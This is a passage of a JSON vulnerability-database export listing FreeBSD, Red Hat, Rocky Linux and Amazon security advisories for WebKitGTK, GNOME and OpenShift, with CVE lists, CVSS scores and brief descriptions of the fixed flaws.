"CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623"], "modified": "2019-04-10T00:00:00", "id": "3DD46E05-9FB0-11E9-BF65-00012E582166", "href": "https://vuxml.freebsd.org/freebsd/3dd46e05-9fb0-11e9-bf65-00012e582166.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2023-11-29T02:41:20", "description": "GNOME is the default desktop environment of Red Hat Enterprise Linux.\n\nSecurity Fix(es):\n\n* evince: uninitialized memory use in function tiff_document_render() and tiff_document_get_thumbnail() (CVE-2019-11459)\n\n* gvfs: improper authorization in daemon/gvfsdaemon.c in gvfsd (CVE-2019-12795)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 8.1 Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-05T17:59:21", "type": "redhat", "title": "(RHSA-2019:3553) Low: GNOME security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11070", "CVE-2019-11459", "CVE-2019-12795", "CVE-2019-3820", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-8506", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8666", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8679", "CVE-2019-8681", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8726", "CVE-2019-8735", "CVE-2019-8768"], "modified": "2021-02-02T07:58:24", "id": "RHSA-2019:3553", "href": "https://access.redhat.com/errata/RHSA-2019:3553", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-02T22:41:23", "description": "WebKitGTK+ is port of the WebKit portable web rendering engine to the GTK+ platform. These packages provide WebKitGTK+ for GTK+ 3.\n\nThe following packages have been upgraded to a later upstream version: webkitgtk4 (2.28.2). (BZ#1817144)\n\nSecurity Fix(es):\n\n* webkitgtk: Multiple security issues (CVE-2019-6237, CVE-2019-6251, CVE-2019-8506, CVE-2019-8524, CVE-2019-8535, CVE-2019-8536, CVE-2019-8544, CVE-2019-8551, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8607, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8625, CVE-2019-8644, CVE-2019-8649, CVE-2019-8658, CVE-2019-8666, CVE-2019-8669, CVE-2019-8671, CVE-2019-8672, CVE-2019-8673, CVE-2019-8674, CVE-2019-8676, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679, CVE-2019-8680, CVE-2019-8681, CVE-2019-8683, CVE-2019-8684, CVE-2019-8686, CVE-2019-8687, CVE-2019-8688, CVE-2019-8689, CVE-2019-8690, CVE-2019-8707, CVE-2019-8710, CVE-2019-8719, CVE-2019-8720, CVE-2019-8726, CVE-2019-8733, CVE-2019-8735, CVE-2019-8743, CVE-2019-8763, CVE-2019-8764, CVE-2019-8765, CVE-2019-8766, CVE-2019-8768, CVE-2019-8769, CVE-2019-8771, CVE-2019-8782, CVE-2019-8783, CVE-2019-8808, CVE-2019-8811, CVE-2019-8812, CVE-2019-8813, CVE-2019-8814, CVE-2019-8815, CVE-2019-8816, CVE-2019-8819, CVE-2019-8820, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823, CVE-2019-8835, CVE-2019-8844, CVE-2019-8846, CVE-2019-11070, CVE-2020-3862, CVE-2020-3864, CVE-2020-3865, CVE-2020-3867, CVE-2020-3868, CVE-2020-3885, CVE-2020-3894, CVE-2020-3895, CVE-2020-3897, CVE-2020-3899, CVE-2020-3900, CVE-2020-3901, CVE-2020-3902, CVE-2020-10018, CVE-2020-11793)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.9 Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-29T07:53:27", "type": "redhat", "title": "(RHSA-2020:4035) Moderate: webkitgtk4 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11070", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-8506", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8625", "CVE-2019-8644", "CVE-2019-8649", "CVE-2019-8658", "CVE-2019-8666", "CVE-2019-8669", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8674", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8678", "CVE-2019-8679", "CVE-2019-8680", "CVE-2019-8681", "CVE-2019-8683", "CVE-2019-8684", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8688", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8707", "CVE-2019-8710", "CVE-2019-8719", "CVE-2019-8720", "CVE-2019-8726", "CVE-2019-8733", "CVE-2019-8735", "CVE-2019-8743", "CVE-2019-8763", "CVE-2019-8764", "CVE-2019-8765", "CVE-2019-8766", "CVE-2019-8768", "CVE-2019-8769", "CVE-2019-8771", "CVE-2019-8782", "CVE-2019-8783", "CVE-2019-8808", "CVE-2019-8811", "CVE-2019-8812", "CVE-2019-8813", "CVE-2019-8814", "CVE-2019-8815", "CVE-2019-8816", "CVE-2019-8819", "CVE-2019-8820", "CVE-2019-8821", "CVE-2019-8822", "CVE-2019-8823", "CVE-2019-8835", "CVE-2019-8844", "CVE-2019-8846", "CVE-2020-10018", "CVE-2020-11793", "CVE-2020-3862", "CVE-2020-3864", "CVE-2020-3865", "CVE-2020-3867", "CVE-2020-3868", "CVE-2020-3885", "CVE-2020-3894", "CVE-2020-3895", "CVE-2020-3897", "CVE-2020-3899", "CVE-2020-3900", "CVE-2020-3901", "CVE-2020-3902", "CVE-2021-30666", "CVE-2021-30761", "CVE-2021-30762"], "modified": "2021-08-30T20:12:25", "id": "RHSA-2020:4035", "href": "https://access.redhat.com/errata/RHSA-2020:4035", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-02T22:41:23", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic (CVE-2020-9283)\n\n* SSL/TLS: CBC padding timing attack (lucky-13) (CVE-2013-0169)\n\n* grafana: XSS vulnerability via a column style on the \"Dashboard > Table Panel\" screen (CVE-2018-18624)\n\n* js-jquery: prototype pollution in object's prototype leading to denial of service or remote code execution or property injection (CVE-2019-11358)\n\n* npm-serialize-javascript: XSS via unsafe characters in serialized regular expressions (CVE-2019-16769)\n\n* kibana: Prototype pollution in TSVB could result in arbitrary code execution (ESA-2020-06) (CVE-2020-7013)\n\n* nodejs-minimist: prototype pollution allows adding or modifying properties of Object.prototype using a constructor or __proto__ payload (CVE-2020-7598)\n\n* npmjs-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser (CVE-2020-7662)\n\n* nodejs-lodash: prototype pollution in zipObjectDeep function (CVE-2020-8203)\n\n* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method (CVE-2020-11022)\n\n* jQuery: passing HTML containing <option> elements to manipulation methods could result in untrusted code execution (CVE-2020-11023)\n\n* grafana: stored XSS (CVE-2020-11110)\n\n* grafana: XSS annotation popup vulnerability (CVE-2020-12052)\n\n* grafana: XSS via column.title or cellLinkTooltip (CVE-2020-12245)\n\n* nodejs-elliptic: improper encoding checks allows a certain degree of signature malleability in ECDSA signatures (CVE-2020-13822)\n\n* golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040)\n\n* nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function (CVE-2020-15366)\n\n* openshift/console: text injection on error page via crafted url (CVE-2020-10715)\n\n* kibana: X-Frame-Option not set by default might lead to clickjacking (CVE-2020-10743)\n\n* openshift: restricted SCC allows pods to craft custom network packets (CVE-2020-14336)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-27T14:57:54", "type": "redhat", "title": "(RHSA-2020:4298) Moderate: OpenShift Container Platform 4.6.1 image security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0169", "CVE-2016-10739", "CVE-2018-14404", "CVE-2018-14498", "CVE-2018-16890", "CVE-2018-18074", "CVE-2018-18624", "CVE-2018-18751", "CVE-2018-19519", "CVE-2018-20060", "CVE-2018-20337", "CVE-2018-20483", "CVE-2018-20657", "CVE-2018-20852", "CVE-2018-9251", "CVE-2019-1010180", "CVE-2019-1010204", "CVE-2019-11070", "CVE-2019-11236", "CVE-2019-11324", "CVE-2019-11358", "CVE-2019-11459", "CVE-2019-12447", "CVE-2019-12448", "CVE-2019-12449", "CVE-2019-12450", "CVE-2019-12795", "CVE-2019-13232", "CVE-2019-13636", "CVE-2019-13752", "CVE-2019-13753", "CVE-2019-14822", "CVE-2019-14973", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1563", "CVE-2019-15718", "CVE-2019-15847", "CVE-2019-16056", "CVE-2019-16769", "CVE-2019-17451", "CVE-2019-18408", "CVE-2019-19126", "CVE-2019-19923", "CVE-2019-19924", "CVE-2019-19925", "CVE-2019-19959", "CVE-2019-3822", "CVE-2019-3823", "CVE-2019-3825", "CVE-2019-3843", "CVE-2019-3844", "CVE-2019-5094", "CVE-2019-5436", "CVE-2019-5481", "CVE-2019-5482", "CVE-2019-5953", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-6454", "CVE-2019-6706", "CVE-2019-7146", "CVE-2019-7149", "CVE-2019-7150", "CVE-2019-7664", "CVE-2019-7665", "CVE-2019-8457", "CVE-2019-8506", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8666", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8675", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8679", "CVE-2019-8681", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8696", "CVE-2019-8726", "CVE-2019-8735", "CVE-2019-8768", "CVE-2020-10531", "CVE-2020-10715", "CVE-2020-10743", "CVE-2020-11008", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11110", "CVE-2020-12049", "CVE-2020-12052", "CVE-2020-12245", "CVE-2020-13822", "CVE-2020-14040", "CVE-2020-14336", "CVE-2020-15366", "CVE-2020-15719", "CVE-2020-1712", "CVE-2020-7013", "CVE-2020-7598", "CVE-2020-7662", "CVE-2020-8203", "CVE-2020-8559", "CVE-2020-9283"], "modified": "2020-10-28T00:36:30", "id": "RHSA-2020:4298", "href": "https://access.redhat.com/errata/RHSA-2020:4298", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rocky": [{"lastseen": "2023-12-03T17:28:34", "description": "An update is available for pidgin, gnome-desktop3, pango, gdk-pixbuf2.\nThis update affects Rocky Linux 8.\nA Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list\nGNOME is the default desktop environment of Rocky Linux.\n\nSecurity Fix(es):\n\n* evince: uninitialized memory use in function tiff_document_render() and tiff_document_get_thumbnail() (CVE-2019-11459)\n\n* gvfs: improper authorization in daemon/gvfsdaemon.c in gvfsd (CVE-2019-12795)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Rocky Linux 8.1 Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-05T17:59:21", "type": "rocky", "title": "GNOME security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11070", "CVE-2019-11459", "CVE-2019-12795", "CVE-2019-3820", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-8506", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8666", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8679", "CVE-2019-8681", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8726", "CVE-2019-8735", "CVE-2019-8768"], "modified": "2019-11-05T17:59:21", "id": "RLSA-2019:3553", "href": "https://errata.rockylinux.org/RLSA-2019:3553", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2023-12-03T19:11:46", "description": "**Issue Overview:**\n\nWebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization. This issue was corrected by changing the way livestreams are downloaded. (CVE-2019-11070)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-6237)\n\nWebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. (CVE-2019-6251)\n\nA type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8506)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8524)\n\nA memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8535)\n\nA memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8536)\n\nA memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8544)\n\nA logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8551)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8558)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8559)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8563)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8571)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8583)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8584)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8586)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8587)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8594)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8595)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8596)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8597)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8601)\n\nAn out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may result in the disclosure of process memory. (CVE-2019-8607)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8608)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8609)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8610)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8611)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8615)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8619)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8622)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8623)\n\nA logic issue was addressed with improved state management. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8625)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8644)\n\nA logic issue existed in the handling of synchronous page loads. This issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8649)\n\nA logic issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8658)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8666)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed 